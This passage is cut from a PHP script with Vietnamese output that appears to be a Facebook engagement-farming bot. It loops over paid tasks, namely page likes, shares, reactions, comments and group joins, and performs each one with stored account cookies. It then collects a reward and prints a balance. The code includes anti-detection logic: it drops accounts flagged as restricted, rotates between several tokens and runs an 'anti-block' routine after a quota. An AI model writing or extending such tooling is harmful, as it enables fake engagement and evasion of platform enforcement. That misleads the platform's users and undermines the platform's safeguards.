   $duocne = $duocne + 1;
   $tt = "\r\033[1;31m|\033[1;37m" . $duocne . "\033[1;31m|\033[1;91m | \033[1;96m" . date("H:i") . "\033[1;91m |\033[1;93m".$_SESSION["C_PAGE"]."\033[1;91m |\033[1;92m +600 \033[1;91m| \033[1;93m" . $sodu . "\e[0m\033[1;91m |\n";
   for ($i = 1; $i < (strlen($tt) + 1); $i++) {
    print $tt[$i];
    usleep(200);
   }
   if ($spam == 1) {
    break;
   }
   if (count($khoToken) > 1) {
    if ($duocne % $doiaccc == 0) {
     $spam = 1;
     break;
    } else {
     usleep(1);
    }
   } else {
    usleep(1);
   }
   loadtime('delaypage');

   if ($nv == $nhiemvu) {
    chongbl('block');

    $nv = "0";
   }
  } else {
   print "\r";
  }
    }
   }
  }
 } else if ($rand == 'share') {
  
  $x = getnv('share');
  if ($x != "") {
   $info = json_decode($x, true);
   $d = "0";
   while (true) {
    $id = $info["data"]["" . $d . ""]["id"];
    if ($id < '1') {
  print "$icon1 \033[1;31mHết nhiệm vụ Share      \r";
  if (count($khoToken) > 1) {
   $demhetnv++;
  }
  if ($demhetnv == 4) {
   $spam = 1;
  }
  break;
    } else {
  $demhetnv = 0;
  $d += 1;
  echo "\033[1;37m".$id."  \r";
  share($id, $cookie);
  $s = nhantien('share', 'share', $id);
  date_default_timezone_set('Asia/Ho_Chi_Minh');
  $t = date('H:i:s');
  $rd = rand(1, 7);
  
  if ($s == 2) {
   $nv += 1;
   $sodu += 800;
   $duocne = $duocne + 1;
   $tt = "\r\033[1;31m|\033[1;37m" . $duocne . "\033[1;31m|\033[1;91m | \033[1;96m" . date("H:i") . "\033[1;91m |\033[1;93m".$_SESSION["C_SHARE"] . "\033[1;91m |\033[1;92m +800 \033[1;91m| \033[1;93m" . $sodu . "\e[0m\033[1;91m |\n";

   for ($i = 1; $i < (strlen($tt) + 1); $i++) {
    print $tt[$i];
    usleep(1500);
   }
   if ($spam == 1) {
    break;
   }
   if (count($khoToken) > 1) {
    if ($duocne % $doiaccc == 0) {
     $spam = 1;
     break;
    } else {
     usleep(1);
    }
   } else {
    usleep(1);
   }
   loadtime('delayshare');

   if ($nv == $nhiemvu) {
    chongbl('block');

    $nv = "0";
   }
  } else {
   print "\r";
  }
    }
   }
  }
 } else if ($rand == 'cx') {
  
  $x = getnv('reaction');
  if ($x != "") {
   $info = json_decode($x, true);
   $d = "0";
   while (true) {
    $id = $info["data"]["" . $d . ""]["id"];
    $type = $info["data"]["" . $d . ""]["type"];
    if ($id < '1') {
  print "$icon1 \033[1;31mHết Nhiệm vụ Reaction \r";
  if (count($khoToken) > 1) {
   $demhetnv++;
  }
  if ($demhetnv == 4) {
   $spam = 1;
  }
  break;
    } else {
  $demhetnv = 0;
  $d += 1;
  echo "\033[1;37m".$id."  \r";
  camxuc($id, $type, $cookie);
  if (strpos($g[1], 'Tài khoản của bạn hiện bị hạn chế') !== false) {
   echo "      \r";
   echo $icon1. "Đã Bị Block Cảm Xúc\n";
   array_splice($khocookie, $xz, 1);
   $spam = 1;
   break;}
  $tp = $type;
  $s = nhantien($tp, 'reaction', $id);

  date_default_timezone_set('Asia/Ho_Chi_Minh');
  $t = date('H:i:s');
  $rd = rand(1, 7);
  
  if ($s == 2) {
   $nv += 1;
   $sodu += 400;
   $duocne = $duocne + 1;

   if (strpos($type, 'LIKE')) {
    $type = $_SESSION["C_LIKE"];
   }
   if (strpos($type, 'LOVE')) {
    $type = $_SESSION["C_LOVE"];
   }
   if (strpos($type, 'CARE')) {
    $type = $_SESSION["C_CARE"];
   }
   if (strpos($type, 'HAHA')) {
    $type = $_SESSION["C_HAHA"];
   }
   if (strpos($type, 'WOW')) {
    $type = $_SESSION["C_WOW"];
   }
   if (strpos($type, 'SAD')) {
    $type = $_SESSION["C_SAD"];
   }
   if (strpos($type, 'ANGRY')) {
    $type = $_SESSION["C_ANGRY"];
   }
   $tt = "\r\033[1;31m|\033[1;37m" . $duocne . "\033[1;31m|\033[1;91m | \033[1;96m" . date("H:i") . "\033[1;91m | \033[1;93m" . $type  . "\033[1;91m |\033[1;92m +400 \033[1;91m| \033[1;93m" . $sodu . "\e[0m\033[1;91m |\n";

   for ($i = 1; $i < (strlen($tt) + 1); $i++) {
    print $tt[$i];
    usleep(1500);
   }
   if ($spam == 1) {
    break;
   }
   if (count($khoToken) > 1) {
    if ($duocne % $doiaccc == 0) {
     $spam = 1;
     break;
    } else {
     usleep(1);
    }
   } else {
    usleep(1);
   }
   loadtime('delaycx');

   if ($nv == $nhiemvu) {
    chongbl('block');

    $nv = "0";
   }
  } else {
   print "\r";
  }
    }
   }
  }
 } elseif ($rand == 'cmt') {
  
  $x = getnv('comment');
  if ($x != "") {
   $info = json_decode($x, true);
   $d = "0";
   while (true) {
    $id = $info["data"]["" . $d . ""]["id"];
    $msg = $info["data"]["" . $d . ""]["msg"];
    if ($id < '1') {
  print "$icon1 \033[1;31mCMT Tạm Thời Hết Nhiệm Vụ   \r";
  if (count($khoToken) > 1) {
   $demhetnv++;
  }
  if ($demhetnv == 4) {
   $spam = 1;
  }
  break;
    } else {
  $demhetnv = 0;
  $d += 1;
  echo "\033[1;37m".$id."  \r";

  $g = cmt_fb_cookie_new($id,$cookie,$msg);
   $s = nhantien('like', 'comment', $id);
   date_default_timezone_set('Asia/Ho_Chi_Minh');
   $t = date('H:i:s');
   $rd = rand(1, 7);
   
   if ($s == 2) {
    $nv += 1;
    $sodu += 600;
    $duocne = $duocne + 1;
    //$tt = " \033[1;31m[\033[1;30m".$ytb."\033[1;31m]\033[1;33m[".$duocne."\033[1;33m] \033[1;31m| \033[1;36m$t\033[1;31m | \033[1;3".$rd."m CMT  \033[1;31m| \033[1;30mSUcccESS \033[1;31m| \033[1;32m+600 \033[1;31m| \033[1;33m".$sodu."\n";
    $tt = "\r\033[1;31m|\033[1;37m" . $duocne . "\033[1;31m|\033[1;91m | \033[1;96m" . date("H:i") . "\033[1;91m |\033[1;93m".$_SESSION["C_CMT"] . "\033[1;91m |\033[1;96m $msg \033[1;91m |\033[1;92m +600 \033[1;91m| \033[1;93m" . $sodu . "\e[0m\033[1;91m | \n";

    for ($i = 1; $i < (strlen($tt) + 1); $i++) {
     print $tt[$i];
     usleep(200);
    }
    if ($spam == 1) {
     break;
    }
    if (count($khoToken) > 1) {
     if ($duocne % $doiaccc == 0) {
   $spam = 1;
   break;
     } else {
   usleep(1);
     }
    } else {
     usleep(1);
    }
    loadtime('delaycmt');

    if ($nv == $nhiemvu) {
     chongbl('block');

     $nv = "0";
    }
   } else {
    print "\r";
   }
  //}
    }
   }
  }
 } elseif ($rand == 'group') {
  
  $x = getnv('group');
  if ($x != "") {
   $info = json_decode($x, true);
   $d = "0";
   while (true) {
    $id = $info["data"]["" . $d . ""]["id"];
    if ($id < '1') {
  print "$icon1 \033[1;31mHết nhiệm vụ Join Group    \r";
  if (count($khoToken) > 1) {
   $demhetnv++;
  }
  if ($demhetnv == 4) {
   $spam = 1;
  }
  break;
    } else {
  $demhetnv = 0;
  $d += 1;
  echo "\033[1;37m".$id."    \r";
  $g = group_fb($id, $useragent, $cookie);
  $s = nhantien('group', 'group', $id);

  date_default_timezone_set('Asia/Ho_Chi_Minh');
  $t = date('H:i:s');
  $rd = rand(1, 7);
  
  if ($s == 2) {
   $nv += 1;
   $sodu += 1400;
   $duocne = $duocne + 1;
   $tt = "\r\033[1;31m|\033[1;37m" . $duocne . "\033[1;31m|\033[1;91m | \033[1;96m" . date("H:i") . "\033[1;91m | \033[1;93m".$_SESSION["C_GROUP"] . "\033[1;91m |\033[1;92m +1400 \033[1;91m| \033[1;93m" . $sodu . "\e[0m\033[1;91m |\n";

   for ($i = 1; $i < (strlen($tt) + 1); $i++) {
    print $tt[$i];
    usleep(200);
   }
   if ($spam == 1) {
    break;
   }
   if (count($khoToken) > 1) {
    if ($duocne % $doiaccc == 0) {
     $spam = 1;
     break;
    } else {
     usleep(1);
    }
   } else {
    usleep(1);
   }
   loadtime('delaygr');
   if ($nv == $nhiemvu) {
    chongbl('block');

    $nv = "0";
   }
  } else {
   print "\r";
  }
    }
   }

  }
 }
   }
  }
 }
}

}